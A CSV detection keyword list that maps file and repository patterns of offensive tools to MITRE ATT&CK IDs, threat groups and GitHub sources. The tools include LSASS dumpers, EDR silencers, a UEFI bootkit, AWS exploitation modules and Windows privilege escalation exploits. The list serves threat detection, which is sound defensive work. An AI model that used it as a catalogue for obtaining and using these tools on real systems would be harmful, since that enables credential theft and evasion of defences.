"*/dumpXor.exe*",".{0,1000}\/dumpXor\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","N/A","10","10","549","76","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z","6851"
"*/dumpXor/dumpXor*",".{0,1000}\/dumpXor\/dumpXor.{0,1000}","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","N/A","10","10","549","76","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z","6852"
"*/dumpy.exe*",".{0,1000}\/dumpy\.exe.{0,1000}","offensive_tool_keyword","Dumpy","Reuse open handles to dynamically dump LSASS","T1003.001 - T1055.001 - T1083","TA0006","N/A","N/A","Credential Access","https://github.com/Kudaes/Dumpy","1","1","N/A","N/A","10","3","243","24","2024-04-04T07:42:26Z","2021-10-13T21:54:59Z","6853"
"*/Dumpy.git*",".{0,1000}\/Dumpy\.git.{0,1000}","offensive_tool_keyword","Dumpy","Reuse open handles to dynamically dump LSASS","T1003.001 - T1055.001 - T1083","TA0006","N/A","N/A","Credential Access","https://github.com/Kudaes/Dumpy","1","1","N/A","N/A","10","3","243","24","2024-04-04T07:42:26Z","2021-10-13T21:54:59Z","6854"
"*/dunderhay/CVE-202*",".{0,1000}\/dunderhay\/CVE\-202.{0,1000}","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tool","https://github.com/dunderhay/CVE-2020-5902","1","1","N/A","N/A","N/A","1","37","8","2024-03-19T01:21:06Z","2020-07-06T04:03:58Z","6855"
"*/duplicates.nse*",".{0,1000}\/duplicates\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6856"
"*/DynastyPersist.git*",".{0,1000}\/DynastyPersist\.git.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","6864"
"*/DynastyPersist/src/*.sh*",".{0,1000}\/DynastyPersist\/src\/.{0,1000}\.sh.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","1","#linux","N/A","9","2","153","17","2024-05-16T05:19:48Z","2023-08-13T15:05:42Z","6865"
"*/e2e_commands.txt*",".{0,1000}\/e2e_commands\.txt.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#linux","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","6866"
"*/e2e_test.py*",".{0,1000}\/e2e_test\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","6867"
"*/Eagle RAT.exe*",".{0,1000}\/Eagle\sRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6868"
"*/eap-info.nse*",".{0,1000}\/eap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6869"
"*/earthworm.exe*",".{0,1000}\/earthworm\.exe.{0,1000}","offensive_tool_keyword","EarthWorm","SOCKS v5 proxy service used for data forwarding in complex network environments","T1090.002 - T1573.001 - T1095","TA0010 - TA0008 - TA0011","N/A","APT27 - APT15 - Calypso - Earth Lusca - Worok","C2","https://github.com/rootkiter/Binary-files/tree/212c43b40e2e4c2e2703400caaa732557b6080a4","1","1","N/A","N/A","10","10","156","177","2021-01-26T23:16:49Z","2019-01-03T05:01:20Z","6870"
"*/EASSniper.git*",".{0,1000}\/EASSniper\.git.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","1","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","6871"
"*/EASSniper.ps1*",".{0,1000}\/EASSniper\.ps1.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","1","N/A","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","6872"
"*/EASSniper.ps1*",".{0,1000}\/EASSniper\.ps1.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","6873"
"*/eas-valid-users.txt*",".{0,1000}\/eas\-valid\-users\.txt.{0,1000}","offensive_tool_keyword","EASSniper","EASSniper is a penetration testing tool for account enumeration and brute force attacks against Exchange Active Sync (EAS)","T1110 - T1078.003 - T1087.002 - T1059.001","TA0006 -TA0007 - TA0009 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/fugawi/EASSniper","1","0","#linux","N/A","10","1","5","4","2018-04-17T23:23:31Z","2018-04-17T22:43:51Z","6874"
"*/ebapc_injection.exe*",".{0,1000}\/ebapc_injection\.exe.{0,1000}","offensive_tool_keyword","RustRedOps","RustRedOps is a repository dedicated to gathering and sharing advanced techniques and offensive malware for Red Team","T1027.002  - T1053.005 - T1204.002 - T1588.002","TA0005 - TA0002 - TA0003 - TA0042","N/A","N/A","Exploitation tool","https://github.com/joaoviictorti/RustRedOps","1","1","N/A","N/A","10","10","1548","176","2025-04-20T18:50:04Z","2023-11-29T16:07:06Z","6875"
"*/Ebowla.git*",".{0,1000}\/Ebowla\.git.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","N/A","10","8","748","171","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z","6876"
"*/ebowla.py*",".{0,1000}\/ebowla\.py.{0,1000}","offensive_tool_keyword","Ebowla","Framework for Making Environmental Keyed Payloads","T1027.002 - T1059.003 - T1140","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/Genetic-Malware/Ebowla","1","1","N/A","N/A","10","8","748","171","2019-01-28T10:45:15Z","2016-04-07T22:29:58Z","6877"
"*/ec2__backdoor_ec2_sec_groups*",".{0,1000}\/ec2__backdoor_ec2_sec_groups.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","6878"
"*/ec2__check_termination_protection*.py",".{0,1000}\/ec2__check_termination_protection.{0,1000}\.py","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","6879"
"*/ec2__startup_shell_script/main.py*",".{0,1000}\/ec2__startup_shell_script\/main\.py.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","6880"
"*/ec2_public_ips_*_*.txt*",".{0,1000}\/ec2_public_ips_.{0,1000}_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","#linux","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","6881"
"*/EC2Looter.py*",".{0,1000}\/EC2Looter\.py.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tool","https://github.com/sebastian-mora/AWS-Loot","1","1","N/A","N/A","N/A","1","70","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z","6882"
"*/echoac-poc.git*",".{0,1000}\/echoac\-poc\.git.{0,1000}","offensive_tool_keyword","echoac-poc","poc stealing the Kernel's KPROCESS/EPROCESS block and writing it to a newly spawned shell to elevate its privileges to the highest possible - nt authority\system","T1068 - T1203 - T1059.003","TA0002 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/kite03/echoac-poc","1","1","N/A","N/A","8","2","138","25","2024-01-09T16:44:00Z","2023-06-28T00:52:22Z","6883"
"*/ecrprivenum.py*",".{0,1000}\/ecrprivenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","1","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","6884"
"*/ecrpubenum.py*",".{0,1000}\/ecrpubenum\.py.{0,1000}","offensive_tool_keyword","quiet-riot","Unauthenticated enumeration of AWS - Azure and GCP Principals","T1087 - T1083 - T1210","TA0007 - TA0001","N/A","N/A","Discovery","https://github.com/righteousgambit/quiet-riot","1","1","N/A","N/A","6","3","224","30","2024-11-13T19:41:26Z","2021-10-28T15:12:27Z","6885"
"*/edb-35948/*",".{0,1000}\/edb\-35948\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6886"
"*/EdgeDump.ahk*",".{0,1000}\/EdgeDump\.ahk.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","1","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","6887"
"*/EDR_Detector.git*",".{0,1000}\/EDR_Detector\.git.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","1","N/A","N/A","7","1","93","14","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z","6888"
"*/EDR_Detector.rs*",".{0,1000}\/EDR_Detector\.rs.{0,1000}","offensive_tool_keyword","EDR_Detector","detect EDR agents on a machine","T1518.001 - T1063","TA0007 - TA0009","N/A","N/A","Collection","https://github.com/trickster0/EDR_Detector","1","1","N/A","N/A","7","1","93","14","2021-11-05T08:10:05Z","2019-08-24T20:50:09Z","6889"
"*/EDRaser.git*",".{0,1000}\/EDRaser\.git.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","6890"
"*/edraser.py*",".{0,1000}\/edraser\.py.{0,1000}","offensive_tool_keyword","EDRaser","EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","N/A","10","4","363","49","2024-04-06T17:42:40Z","2023-08-10T04:30:45Z","6891"
"*/edr-checker/*",".{0,1000}\/edr\-checker\/.{0,1000}","offensive_tool_keyword","KittyStager","KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.","T1021.002 - T1055.012 - T1105","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/Enelg52/KittyStager","1","0","N/A","N/A","10","10","220","40","2023-06-06T11:38:39Z","2022-10-10T11:31:23Z","6892"
"*/EDRPrison.git*",".{0,1000}\/EDRPrison\.git.{0,1000}","offensive_tool_keyword","EDRPrison","Leverage a legitimate WFP callout driver to prevent EDR agents from sending telemetry","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/senzee1984/EDRPrison","1","1","N/A","N/A","10","5","401","37","2024-08-02T18:10:02Z","2024-06-30T01:17:04Z","6893"
"*/EDRSandblast.git*",".{0,1000}\/EDRSandblast\.git.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","1","N/A","N/A","10","10","1633","292","2024-08-30T20:30:31Z","2021-11-02T15:02:42Z","6894"
"*/EDRSandblast/*",".{0,1000}\/EDRSandblast\/.{0,1000}","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","COZY BEAR","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","N/A","10","3","260","48","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z","6895"
"*/EDRSilencer.c*",".{0,1000}\/EDRSilencer\.c.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","1","N/A","N/A","10","10","1645","209","2024-11-03T16:05:14Z","2023-12-26T04:15:39Z","6896"
"*/EDRSilencer.git*",".{0,1000}\/EDRSilencer\.git.{0,1000}","offensive_tool_keyword","EDRSilencer","A tool uses Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server","T1562.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/netero1010/EDRSilencer","1","1","N/A","N/A","10","10","1645","209","2024-11-03T16:05:14Z","2023-12-26T04:15:39Z","6897"
"*/EfiDSEFix.cpp*",".{0,1000}\/EfiDSEFix\.cpp.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","6898"
"*/EfiDSEFix.exe*",".{0,1000}\/EfiDSEFix\.exe.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","6899"
"*/EfiGuard.sln*",".{0,1000}\/EfiGuard\.sln.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","6900"
"*/EfiGuardDxe.c*",".{0,1000}\/EfiGuardDxe\.c.{0,1000}","offensive_tool_keyword","EfiGuard","EfiGuard is a portable x64 UEFI bootkit that patches the Windows boot manager - boot loader and kernel at boot time in order to disable PatchGuard and Driver Signature Enforcement (DSE).","T1542.002 - T1542.003 - T1542.004","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mattiwatti/EfiGuard","1","1","N/A","N/A","10","10","1977","354","2025-02-24T11:57:36Z","2019-03-25T19:47:39Z","6901"
"*/EfsPotato.exe*",".{0,1000}\/EfsPotato\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6902"
"*/EfsPotato.git*",".{0,1000}\/EfsPotato\.git.{0,1000}","offensive_tool_keyword","EfsPotato","Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability)","T1068 - T1055.002 - T1070.004","TA0003 - TA0005 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/EfsPotato","1","1","N/A","N/A","10","8","771","125","2023-12-14T14:30:15Z","2021-07-26T21:36:16Z","6903"
"*/egghunter.rb*",".{0,1000}\/egghunter\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6904"
"*/Egress-Assess*",".{0,1000}\/Egress\-Assess.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","6905"
"*/elevate_handle_inheritance.py*",".{0,1000}\/elevate_handle_inheritance\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","6907"
"*/elevate_mofcomp.py*",".{0,1000}\/elevate_mofcomp\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","6908"
"*/elevate_named_pipe_impersonation.py*",".{0,1000}\/elevate_named_pipe_impersonation\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","6909"
"*/elevate_schtasks.py*",".{0,1000}\/elevate_schtasks\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","6910"
"*/elevate_token_impersonation.py*",".{0,1000}\/elevate_token_impersonation\.py.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","1","N/A","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","6911"
